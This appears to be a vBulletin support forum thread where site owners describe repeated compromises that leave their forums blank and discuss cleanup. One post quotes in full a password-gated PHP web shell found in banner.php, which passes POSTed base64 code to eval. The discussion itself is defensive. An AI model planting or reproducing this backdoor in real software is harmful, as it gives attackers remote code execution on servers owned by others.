Help. Both forum and admin panel just show white page

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • BirdOPrey5
    Senior Member
    • Jul 2008
    • 9613
    • 5.6.3

    #31
    Can you or your host determine how the files are being altered?

    Comment

    • Dominic.J.E
      New Member
      • Mar 2008
      • 3
      • 3.6.x

      #32
      Well, it was perfectly fine for 2 days after cleaning up everything and I even left the plugin system "Disabled" through config file. Now the site is blank white pages again and banner.php was uploaded again (already had this and the other files deleted) with the code:

      <?php
      if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
      eval (base64_decode($_POST["php"]));
      exit;
      }
      ?>

      And now a lot of the pages have the base64 again. So we can knock off Custom Modifications / Plugins off this list.

      Their host is not cooperating and saying they don't support third party scripts.
      I'm looking at "Last Modified" date and it seems to not change to the newest date they did it, even with these code modifications.

      Comment

      • Mr. Fancy Pants
        New Member
        • Nov 2007
        • 15
        • 3.6.x

        #33
        I just had to deal with this too, in fact.....still am. I sure hope Vbulletin is looking real hard at this issue. Once they got in via our forum, I found additional php files in the root of my public_html folder. A uploader php file, pawn3d php file and a database php file. Also, a Story php file in the forums root.

        VBulletin, are you looking into this??

        Comment

        • BirdOPrey5
          Senior Member
          • Jul 2008
          • 9613
          • 5.6.3

          #34
          At this time these is still no known exploit causing this issue- it seems to be people affected by the old "install" folder hack that were never cleaned up properly. That is to say backdoors were left in plugins and/or in directories on the server and were left dormant until recently. If we determine there is any unknown exploit we will take action quickly,

          Comment

          • psypher
            New Member
            • Dec 2009
            • 10
            • 4.0.0

            #35
            I have been hacked with this same exploit 8 times over the last 2 months. I am on 4.2.2. I have 5 different websites on the same host. The only site that is being hacked is the one running VBulliten. In my mind it is safe to assume VB has been very insecure since the install folder exploit and hasn't become any better. I have no new admin account, I have no installed any plugins recently. I have to change all my passwords and clean my site weekly.

            There is no way I can continue paying for this software and upgrade to 5. I have lost all faith in VB. It was a good run boys but time to move on to something more secure.

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73976

              #36
              You changed all your passwords? FTP, CPanel, vBulletin? You placed .htaccess on your admincp directory? Are you running vBSEO? If so, I suggest removing it immediately.

              If you continue to get attacked, there is a backdoor on your server somewhere. Most likely placed during the initial attack. Did you go through all the steps in the "Securing your site thread". As stated in that thread, skipping one can leave you vulnerable to future attacks.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              • psypher
                New Member
                • Dec 2009
                • 10
                • 4.0.0

                #37
                I have changed all those passwords. I have not moved my htaccess file. I am not running a vbSOE.

                That thread was the first thing I went through. I have been running the queries and running greps for the infected files. Clearly there is some type of backdoor. Problem is finding and removing it. Unfortunately I was away for a couple months so any backups of a clean site are long gone for me and I fear the issue is in my database which I absolutely cannot afford to lose.

                TheLastSuperman has some other things I can try in his thread. Hopefully something will work so I can at least get to the point of migrating my database to something stable. I find it hard to believe there has been no acknowledgement from VB on this issue. It has to be kicking sales in the nuts having a new major hack for the software every couple months.

                Comment

                • Inzvestor
                  New Member
                  • Nov 2010
                  • 21

                  #38
                  I am just reinstalling my forum for about the 8th time and will be calling support shortly

                  Same problem keeps occurring and I have followed the instructions to the letter each time.

                  Comment

                  • Inzvestor
                    New Member
                    • Nov 2010
                    • 21

                    #39
                    dupe post

                    Comment

                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                    Working...